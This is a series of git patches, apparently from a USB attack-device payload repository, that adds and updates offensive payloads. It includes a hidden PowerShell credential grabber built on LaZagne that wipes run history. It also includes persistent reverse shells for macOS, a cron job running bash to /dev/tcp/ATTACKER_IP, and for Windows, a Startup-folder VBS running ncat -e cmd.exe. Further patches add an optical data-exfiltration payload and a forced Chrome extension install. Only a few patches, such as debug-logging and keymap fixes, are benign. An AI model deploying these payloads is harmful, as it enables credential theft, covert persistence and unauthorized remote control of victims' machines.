From 650772e9e40c13df67cd0a5c4cbbff28cd755bb2 Mon Sep 17 00:00:00 2001 From: bg-wa Date: Tue, 9 Jan 2018 14:22:29 -0800 Subject: [PATCH 01/16] Added debug extension (#155) --- payloads/extensions/debug.sh | 40 ++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 payloads/extensions/debug.sh diff --git a/payloads/extensions/debug.sh b/payloads/extensions/debug.sh new file mode 100644 index 00000000..e58b0b66 --- /dev/null +++ b/payloads/extensions/debug.sh @@ -0,0 +1,40 @@ +#!/bin/bash + +################################################################################ +# Allow Debugging messages written to: "/root/udisk/debug/[session].txt" +# on the BashBunny +# +# How this works? +# 1) Example Command: DEBUG "switch-1-debug" "Hello from debug extension!" +# 2) After bashing, text can be read at: "/root/udisk/debug/[session].txt" +# on the BashBunny +################################################################################ + +function DEBUG() { + session = $1 + message = $2 + + init_debug + debug_log + + timestamp () { + echo "$(date +"%Y-%m-%d_%H-%M-%S")" + } + + init_debug () { + DEBUG_FILE="/root/udisk/debug/$(session).txt" + if [ ! -d "/root/udisk/debug/" ]; then + mkdir /root/udisk/debug/ + fi + if [ ! -f "/root/udisk/debug/${DEBUG_FILE}" ]; then + touch "${DEBUG_FILE}" + echo "$(timestamp): DEBUG STARTED" >> "${DEBUG_FILE}" + fi + } + + debug_log () { + echo "$(timestamp): $(message)" >> "${DEBUG_FILE}" + } +} + +export -f DEBUG From 940dc0904369f271a587a31bee2b9221ba28118a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jonathan=20Deb=C3=A9taz?= Date: Mon, 15 Jan 2018 06:36:49 +0100 Subject: [PATCH 02/16] Payload updates (#309) --- .../library/credentials/PasswordGrabber/d.cmd | 4 -- .../library/credentials/PasswordGrabber/e.cmd | 24 --------- .../library/credentials/PasswordGrabber/i.vbs | 1 - .../credentials/PasswordGrabber/payload.ps1 | 5 ++ .../credentials/PasswordGrabber/payload.txt | 38 +++++++++----- .../credentials/PasswordGrabber/readme.md | 49 +++++++++---------- 6 files changed, 53 insertions(+), 68 deletions(-) delete mode 100644 payloads/library/credentials/PasswordGrabber/d.cmd delete mode 100644 payloads/library/credentials/PasswordGrabber/e.cmd delete mode 100644 payloads/library/credentials/PasswordGrabber/i.vbs create mode 100644 payloads/library/credentials/PasswordGrabber/payload.ps1 diff --git a/payloads/library/credentials/PasswordGrabber/d.cmd b/payloads/library/credentials/PasswordGrabber/d.cmd deleted file mode 100644 index 604ef639..00000000 --- a/payloads/library/credentials/PasswordGrabber/d.cmd +++ /dev/null @@ -1,4 +0,0 @@ -@echo off -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" -cscript %~dp0\i.vbs %~dp0\e.cmd -@exit \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd deleted file mode 100644 index 27792067..00000000 --- a/payloads/library/credentials/PasswordGrabber/e.cmd +++ /dev/null @@ -1,24 +0,0 @@ -@echo off -@echo Installing Windows Update - -setlocal -cd /d %~dp0 - -REM Time and Date -set drec=%COMPUTERNAME%_%date%_%TIME: =0% -set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec% -mkdir %dst% >>nul - -REM This executes LaZagne in the current directory and outputs the password file to Loot -%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt" - - -if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* ( -xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul -) - -REM Blink CAPSLOCK key -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" - -@cls -@exit diff --git a/payloads/library/credentials/PasswordGrabber/i.vbs b/payloads/library/credentials/PasswordGrabber/i.vbs deleted file mode 100644 index 1ffd3c3e..00000000 --- a/payloads/library/credentials/PasswordGrabber/i.vbs +++ /dev/null @@ -1 +0,0 @@ -CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False diff --git a/payloads/library/credentials/PasswordGrabber/payload.ps1 b/payloads/library/credentials/PasswordGrabber/payload.ps1 new file mode 100644 index 00000000..885f9caf --- /dev/null +++ b/payloads/library/credentials/PasswordGrabber/payload.ps1 @@ -0,0 +1,5 @@ +$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber') +$filter = 'password_'+ $env:COMPUTERNAME +$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) +Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 797dab41..560c3ae4 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt @@ -1,19 +1,33 @@ #!/bin/bash # # Title: Password Grabber -# Author: Razerblade -# Version: 1.2 -# Target: Windows -# Props: Hak5Darren, TeCHemically, dragmus31 +# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... +# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. +# This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. +# Author: jdebetaz +# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade +# Version: 1.1 # Category: Credentials -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn steals credentials by using LaZagne and saves them to /Loot -# +# Target: Windows +# Attackmodes: HID, STORAGE + +# Options +LOOTDIR=/root/udisk/loot/PasswordGrabber + +######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION -LED ATTACK ATTACKMODE HID STORAGE -RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" -LED FINISH + +######## MAKE LOOT DIRECTORY ######## +# Setup named logs in loot directory +mkdir -p $LOOTDIR + +######## ATTACK ######## +LED ATTACK +RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" +# Wait until passwords are grabbed. +sleep 10 + +######## FINISH ######## +LED FINISH \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md index 18129740..31fe7418 100644 --- a/payloads/library/credentials/PasswordGrabber/readme.md +++ b/payloads/library/credentials/PasswordGrabber/readme.md @@ -1,40 +1,35 @@ # PasswordGrabber -* Author: RazerBlade -* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31 -* Version: Version 1.2 -* Firmware support: 1.1+ -* Target: Windows 7+ +* Author: [jdebetaz](https://github.com/jdebetaz) +* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade +* Version: 1.3 +* Frimware support: 1.1 and higher +* Target version: Windows 7 and higher ## Description +Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. -Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... -This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. -This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. - -Full read here: https://github.com/AlessandroZ/LaZagne -Downloads here: https://github.com/AlessandroZ/LaZagne/releases - +Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne) ## Configuration -1. You need to download the latest file from LaZagnes release page. -2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe -3. Plug it in a computer and PWN them. +1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). +2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe +3. Plug your BashBunny and Enjoy -Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. +Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. -## INFO -By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. +## Info +jdebetaz: I remake this playload with the Payload Best Practice / Style Guide -## DISCLAIMER -Hak5 is not responsible for the execution of 3rd party binaries. -## STATUS +RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. -| LED | Status | -| ------------------ | -------------------------------------------- | -| Red | Attack Setup | -| Green | Attack Complete | +## Disclaimer +__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__ -## Discussion -[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ +## Led status +| LED | Status | +|-----------------------------------------------|--------| +| Magenta solid | Setup | +| Yellow single blink | Attack | +| Green 1000ms VERYFAST blink followed by SOLID | Finish | From b644446f40a4de18e57facd978d32d7fbd7cc043 Mon Sep 17 00:00:00 2001 From: Simon Dankelmann Date: Mon, 22 Jan 2018 00:37:26 +0100 Subject: [PATCH 03/16] Added German umlauts to de.json (#311) --- languages/de.json | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) mode change 100644 => 100755 languages/de.json diff --git a/languages/de.json b/languages/de.json old mode 100644 new mode 100755 index aced3056..fe659267 --- a/languages/de.json +++ b/languages/de.json @@ -17,6 +17,7 @@ "__comment":" ", "__comment":"A = LeftShift + a, { = LeftShift + [", "__comment":" ", + "__comment":"German umlauts added by Simon Dankelmann", "a":"00,00,04", "b":"00,00,05", "c":"00,00,06", @@ -165,5 +166,14 @@ "|":"40,00,64", "COMMAND-CTRL-SHIFT":"40,00,64", "COMMAND-CTRL":"40,00,64", - "COMMAND-OPTION-SHIFT'":"40,00,64" -} \ No newline at end of file + "COMMAND-OPTION-SHIFT'":"40,00,64", + "ß":"00,00,2d", + "€":"40,00,08", + "§":"02,00,20", + "ä":"00,00,34", + "ö":"00,00,33", + "ü":"00,00,2f", + "Ä":"02,00,34", + "Ö":"02,00,33", + "Ü":"02,00,2f" +} From a998f5c86ca0aee3cd2adb0ed11f6f3a4ac380f5 Mon Sep 17 00:00:00 2001 From: c64whiz Date: Sun, 21 Jan 2018 15:38:38 -0800 Subject: [PATCH 04/16] Add random interval to InfiniteControl payload (#310) --- .../library/general/InfiniteControl/payload.txt | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/payloads/library/general/InfiniteControl/payload.txt b/payloads/library/general/InfiniteControl/payload.txt index d35fc3ce..5a0e6936 100644 --- a/payloads/library/general/InfiniteControl/payload.txt +++ b/payloads/library/general/InfiniteControl/payload.txt @@ -26,6 +26,13 @@ ATTACKMODE HID INFINITE_KEY=CTRL #INFINITE_KEY=BREAK +# Setting MAX_SECONDS will utilize random value +# else leave blank, "MAX_SECONDS=", to use +# FIXED_SECONDS value every time. +# 300 == 5min +MAX_SECONDS=300 +FIXED_SECONDS=9 + # infinite while loop while true do @@ -33,7 +40,13 @@ do QUACK $INFINITE_KEY sleep 1 LED ATTACK - sleep 9 + # Slight change from original to support "random" + # delays between key presses. + if [ ! -z MAX_SECONDS ]; then + sleep $(($RANDOM % $MAX_SECONDS)) + else + sleep $FIXED_SECONDS + fi done # this code will never be reached From 7f902403d49961614d3d2cfd34c4db16a3ea5441 Mon Sep 17 00:00:00 2001 From: KeenanV Date: Sun, 21 Jan 2018 15:39:14 -0800 Subject: [PATCH 05/16] Persistent Reverse Shells for MacOS and Windows 10 (#306) --- .../MacPersistentReverseShell/README.md | 44 ++++++++++++++++++ .../MacPersistentReverseShell/payload.txt | 32 +++++++++++++ .../WindowsPersistentReverseShell/README.md | 45 +++++++++++++++++++ .../WindowsPersistentReverseShell/payload.txt | 18 ++++++++ .../persistence.vbs | 7 +++ .../WindowsPersistentReverseShell/run.ps1 | 20 +++++++++ 6 files changed, 166 insertions(+) create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/README.md create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/payload.txt create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/README.md create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 diff --git a/payloads/library/remote_access/MacPersistentReverseShell/README.md b/payloads/library/remote_access/MacPersistentReverseShell/README.md new file mode 100644 index 00000000..591202e4 --- /dev/null +++ b/payloads/library/remote_access/MacPersistentReverseShell/README.md @@ -0,0 +1,44 @@ +# Reverse Shell Mac for Bash Bunny + +* Author: 0dyss3us (KeenanV) +* Version: 1.2 + +## Description + +Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. +* Targets MacOS +* Connection can be closed and reconnected at any time +* Deploys in roughly 23 sec +* Works well with NetCat as the listener + +## Requirements + +Have a working Bash Bunny :) + +## STATUS + +| LED | STATUS | +| -------------------- | ---------------------------- | +| Purple | Setup | +| Amber (Single Blink) | Launching Terminal | +| Amber (Double Blink) | Creating cron job | +| White (Fast Blink) | Cleaning up | +| Green | Finished | + +## Configuration and Execution + +1. Plug in Bash Bunny in arming mode +2. Move files from MacPersistentReverseShell to either switch folder +3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:) +5. Unplug Bash Bunny and switch it to the position the payload is loaded on +6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) +7. Unplug the Bash Bunny and go to attacker's machine +8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat) + * If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh) + * If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe. +9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) +10. Once a bash shell prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in + +## Discussion + +[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post. diff --git a/payloads/library/remote_access/MacPersistentReverseShell/payload.txt b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt new file mode 100644 index 00000000..f25b9034 --- /dev/null +++ b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt @@ -0,0 +1,32 @@ +# Title: Mac Persistent Reverse Shell +# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host +# Author: 0dyss3us (KeenanV) +# Props: +# Version: 1.2 +# Category: Remote Access +# Target: MacOS +# Attackmodes: HID, Storage + +# Sets attack modes and stores current switch position +LED SETUP +ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E +GET_SWITCH_POSITION + +# Opens the terminal +LED STAGE1 +RUN OSX terminal +Q DELAY 2000 + +# Makes a cron job that will run once every minute +Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab - +Q ENTER +Q DELAY 2000 + +LED CLEANUP +# Clears and kills the terminal to hide the evidence +Q STRING clear +Q ENTER +Q DELAY 500 +Q STRING killall Terminal +Q ENTER +LED FINISH diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/README.md b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md new file mode 100644 index 00000000..2b318c6c --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md @@ -0,0 +1,45 @@ +# Windows Persistent Reverse Shell for Bash Bunny + +* Author: 0dyss3us (KeenanV) +* Version: 1.1 + +## Description + +Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. +* Targets Windows 10 (working on support for older versions) +* Connection can be closed and reconnected at any time +* Deploys in roughly 15-20 sec +* Works with NetCat + +## Requirements + +Have a working Bash Bunny :) + +## STATUS + +| LED | STATUS | +| -------------------- | ------------------------------ | +| Purple | Setup | +| Amber (Single Blink) | Installing and running scripts | +| Green | Finished | + +## Installation and Execution + +1. Plug in Bash Bunny in arming mode +2. Move files from WindowsPersistentReverseShell to either switch folder +3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder. +4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:) +5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny +6. Save the persistence.vbs file +7. Unplug Bash Bunny and switch it to the position the payload is loaded on +8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) +9. Unplug the Bash Bunny and go to attacker's machine +10. Listen on the port you chose in the persistence.vbs file on NetCat + * Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs) + * If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory. +11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) +12. Once a Windows cmd prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect at any time as long as the user is logged in + +## Discussion + +[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt new file mode 100644 index 00000000..fc89bd61 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt @@ -0,0 +1,18 @@ +# Title: NetCat Reverse Shell Windows +# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat +# Author: 0dyss3us (KeenanV) +# Props: +# Version: 1.0 +# Category: Remote Access +# Target: Windows 10 +# Attackmodes: HID, Storage + +#Sets attack mode and stores current switch position +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +#Runs Powershell script which puts a .vbs file in the startup folder and runs it +LED ATTACK +RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" +LED FINISH \ No newline at end of file diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs new file mode 100644 index 00000000..f6db2e03 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs @@ -0,0 +1,7 @@ +Dim ncShell +Set ncShell = WScript.CreateObject("WScript.shell") + +Do while True: + ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true + WScript.Sleep(60000) +loop diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 new file mode 100644 index 00000000..b6b81438 --- /dev/null +++ b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 @@ -0,0 +1,20 @@ +$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name +$user = $env:UserName +$NetCatFile = $Drive + "payloads\switch1\ncat.exe" +$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs" +$DestinationFile1 = "C:\temp\ncat.exe" +$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs") + +If ((Test-Path $DestinationFile1) -eq $false){ + New-Item -ItemType File -Path $DestinationFile1 -Force +} +If ((Test-Path $DestinationFile2) -eq $false){ + New-Item -ItemType File -Path $DestinationFile2 -Force +} + +Copy-Item -Path $NetCatFile -Destination $DestinationFile1 +Copy-Item -Path $PersistenceFile -Destination $DestinationFile2 + +Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup") + +Start-Process cmd -ArgumentList "/c start persistence.vbs" \ No newline at end of file From b37aed0edcfabe3d4c8550fba3d0601053dd3483 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Tue, 23 Jan 2018 14:12:30 -0500 Subject: [PATCH 06/16] fixes debug extention (#312) - resolve sytax errors with variable declarations - resolve misuse of command substition / variabl dereferencing - internal functions were being called before being declared - remove superfluous file existence checks --- payloads/extensions/debug.sh | 25 ++++++------------------- 1 file changed, 6 insertions(+), 19 deletions(-) diff --git a/payloads/extensions/debug.sh b/payloads/extensions/debug.sh index e58b0b66..f575dfe6 100644 --- a/payloads/extensions/debug.sh +++ b/payloads/extensions/debug.sh @@ -11,30 +11,17 @@ ################################################################################ function DEBUG() { - session = $1 - message = $2 - - init_debug - debug_log + session=$1 + message=$2 timestamp () { echo "$(date +"%Y-%m-%d_%H-%M-%S")" } - init_debug () { - DEBUG_FILE="/root/udisk/debug/$(session).txt" - if [ ! -d "/root/udisk/debug/" ]; then - mkdir /root/udisk/debug/ - fi - if [ ! -f "/root/udisk/debug/${DEBUG_FILE}" ]; then - touch "${DEBUG_FILE}" - echo "$(timestamp): DEBUG STARTED" >> "${DEBUG_FILE}" - fi - } - - debug_log () { - echo "$(timestamp): $(message)" >> "${DEBUG_FILE}" - } + mkdir -p /root/udisk/debug/ + debug_file="/root/udisk/debug/${session}.txt" + [[ -f "${debug_file}" ]] || echo "$(timestamp): DEBUG STARTED" >> "${debug_file}" + echo "$(timestamp): ${message}" >> ${debug_file} } export -f DEBUG From 81e6d536dd980475fa2a5df727958535795c4a0d Mon Sep 17 00:00:00 2001 From: bg-wa Date: Fri, 26 Jan 2018 20:47:39 -0800 Subject: [PATCH 07/16] Added Optical Exfiltration Payload (#316) --- .../optical-exfiltration/index.min.html | 26 ++++++++ .../optical-exfiltration/payload.txt | 59 +++++++++++++++++++ 2 files changed, 85 insertions(+) create mode 100644 payloads/library/exfiltration/optical-exfiltration/index.min.html create mode 100755 payloads/library/exfiltration/optical-exfiltration/payload.txt diff --git a/payloads/library/exfiltration/optical-exfiltration/index.min.html b/payloads/library/exfiltration/optical-exfiltration/index.min.html new file mode 100644 index 00000000..811af6c7 --- /dev/null +++ b/payloads/library/exfiltration/optical-exfiltration/index.min.html @@ -0,0 +1,26 @@ + + + + + QR Extract + + + + + +
+

+
+

+ + +
+ + diff --git a/payloads/library/exfiltration/optical-exfiltration/payload.txt b/payloads/library/exfiltration/optical-exfiltration/payload.txt new file mode 100755 index 00000000..a7463e39 --- /dev/null +++ b/payloads/library/exfiltration/optical-exfiltration/payload.txt @@ -0,0 +1,59 @@ +#!/bin/bash +# +# Title: Optical Exfiltration +# Author: bg-wa +# Version: 1.0 +# Category: HID +# Target: *NIX +# Attackmodes: HID +# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor +# +# Quick HID only attack to write an HTML/JS file to target machine +# and open a browser, to exfiltrate data Using QR Codes and a video +# recording device. +# +# | Attack Stage | Description | +# | ------------------- | ---------------------------------------- | +# | SETUP | Open vi | +# | ATTACK | Writing HTML | +# | FINISH | Browser Ready | +# + +ATTACKMODE HID +LED SETUP + +target_html=\~\/index.html + +RUN UNITY xterm +Q DELAY 1000 +Q STRING rm "$target_html" +Q ENTER +Q DELAY 500 +Q STRING vi "$target_html" +Q ENTER +Q DELAY 1000 +Q STRING i + +LED ATTACK + +payload_dir=/root/udisk/payloads/$SWITCH_POSITION +source_html=$payload_dir/index.min.html + +while IFS= read data +do + if [ "${data}" = " " ] + then + Q SPACE + else + Q STRING "$data" + fi +done < "$source_html" + +Q ESC +Q STRING :x +Q ENTER + +Q STRING firefox "$target_html" +Q ENTER + +LED FINISH \ No newline at end of file From 920ff7fa678c75fb89c60c37ee574b70fc7bfde7 Mon Sep 17 00:00:00 2001 From: bg-wa Date: Sat, 27 Jan 2018 15:24:58 -0800 Subject: [PATCH 08/16] New options for optical exfil payload (#317) --- .../exfiltration/optical-exfiltration/index.min.html | 6 +++--- .../exfiltration/optical-exfiltration/payload.txt | 11 ++++++++++- 2 files changed, 13 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/optical-exfiltration/index.min.html b/payloads/library/exfiltration/optical-exfiltration/index.min.html index 811af6c7..0dcd69d6 100644 --- a/payloads/library/exfiltration/optical-exfiltration/index.min.html +++ b/payloads/library/exfiltration/optical-exfiltration/index.min.html @@ -4,17 +4,17 @@ QR Extract - +

diff --git a/payloads/library/exfiltration/optical-exfiltration/payload.txt b/payloads/library/exfiltration/optical-exfiltration/payload.txt index a7463e39..6f70b5df 100755 --- a/payloads/library/exfiltration/optical-exfiltration/payload.txt +++ b/payloads/library/exfiltration/optical-exfiltration/payload.txt @@ -12,11 +12,20 @@ # and open a browser, to exfiltrate data Using QR Codes and a video # recording device. # +# Optional html params: +# base64: Passing a base64 string to this param will auto-start processing QR Codes. +# +# playback: Passing the string "finish" to this param will auto-play the results, +# when QR codes finish rendering. +# +# Example: +# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string" +# # | Attack Stage | Description | # | ------------------- | ---------------------------------------- | # | SETUP | Open vi | # | ATTACK | Writing HTML | -# | FINISH | Browser Ready | +# | FINISH | Browser Ready/Processing | # ATTACKMODE HID From 65ad5f6e89a15367325c799ad0ee3e1080b59f37 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Sat, 27 Jan 2018 18:25:55 -0500 Subject: [PATCH 09/16] fixes mac_happy extension (#313) - fixes state leakage of `command` variable by removing it - remove unecessary use of forked processes/sub-commands - combine input validation conditionals - match the standard of existing extensions of exporting function names as all caps - bump version number --- payloads/extensions/mac_happy.sh | 22 ++++++---------------- 1 file changed, 6 insertions(+), 16 deletions(-) diff --git a/payloads/extensions/mac_happy.sh b/payloads/extensions/mac_happy.sh index 2ceb581f..97aabaf0 100755 --- a/payloads/extensions/mac_happy.sh +++ b/payloads/extensions/mac_happy.sh @@ -1,26 +1,16 @@ #!/bin/bash -#Title: Mac_Happy +# Title: Mac_Happy # Author: thehappydinoa # Target: Mac -# Version: 0.1 +# Version: 0.2 # # Makes Mac happy by correctly setting pid and vid # Use by running mac_happy ATTACKMODE HID # -function mac_happy() { - [[ -z "$1" ]] && exit 1 # parameter must be set - - [[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE - - for i in $*; - do - command=$(echo $command $i) - done - - command=$(echo $command VID_0X05AC PID_0X021E) - - eval $command +function MAC_HAPPY() { + [[ "$#" -gt 1 && "$1" == "ATTACKMODE" ]] || exit 1 + eval "$@ vid_0x05ac pid_0x021e" } -export -f mac_happy +export -f MAC_HAPPY From 63453543754b9418e97e5ec551e575815013f066 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Sat, 27 Jan 2018 18:26:53 -0500 Subject: [PATCH 10/16] Added chrome extension installer payload (#315) - uses new AUTOETHERNET attackmode - uses new GET TARGET_OS functionality - uses new DEBUG function - uses new MAC_HAPPY extension --- payloads/library/prank/ncage/osx.txt | 55 ++++++++++++++++++++++++ payloads/library/prank/ncage/payload.txt | 44 +++++++++++++++++++ payloads/library/prank/ncage/readme.md | 26 +++++++++++ payloads/library/prank/ncage/win.txt | 35 +++++++++++++++ 4 files changed, 160 insertions(+) create mode 100644 payloads/library/prank/ncage/osx.txt create mode 100644 payloads/library/prank/ncage/payload.txt create mode 100644 payloads/library/prank/ncage/readme.md create mode 100644 payloads/library/prank/ncage/win.txt diff --git a/payloads/library/prank/ncage/osx.txt b/payloads/library/prank/ncage/osx.txt new file mode 100644 index 00000000..e9da9a08 --- /dev/null +++ b/payloads/library/prank/ncage/osx.txt @@ -0,0 +1,55 @@ +REM Title: Chrome Extension Installer +REM Author: audibleblink +DELAY 1000 + +REM Open Extension URL +GUI SPACE +DELAY 500 +STRING chrome +DELAY 500 +ENTER +DELAY 4000 +GUI l +DELAY 200 +STRING https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol +DELAY 500 +ENTER + +DELAY 3000 + +REM Open the JavaScript console in the browser +REM GUI-ALT j doesn't work, so we have to do it the long way +CTRL F2 +DELAY 100 +STRING v +DELAY 100 +DOWNARROW +DELAY 100 +STRING d +DELAY 100 +RIGHTARROW +DELAY 100 +STRING j +DELAY 100 +ENTER + +DELAY 3000 + +REM Use jQuery to click the Install button +STRING $("div[role='button']").click() +ENTER + +DELAY 2000 + +REM Confirm the installation +REM Depends on a MacOS setting that allows tabbing through dialogs +SHIFT TAB +DELAY 300 +SPACE + +DELAY 4000 + +REM Close the tabs you just opened +GUI w +DELAY 300 +GUI w diff --git a/payloads/library/prank/ncage/payload.txt b/payloads/library/prank/ncage/payload.txt new file mode 100644 index 00000000..7a183600 --- /dev/null +++ 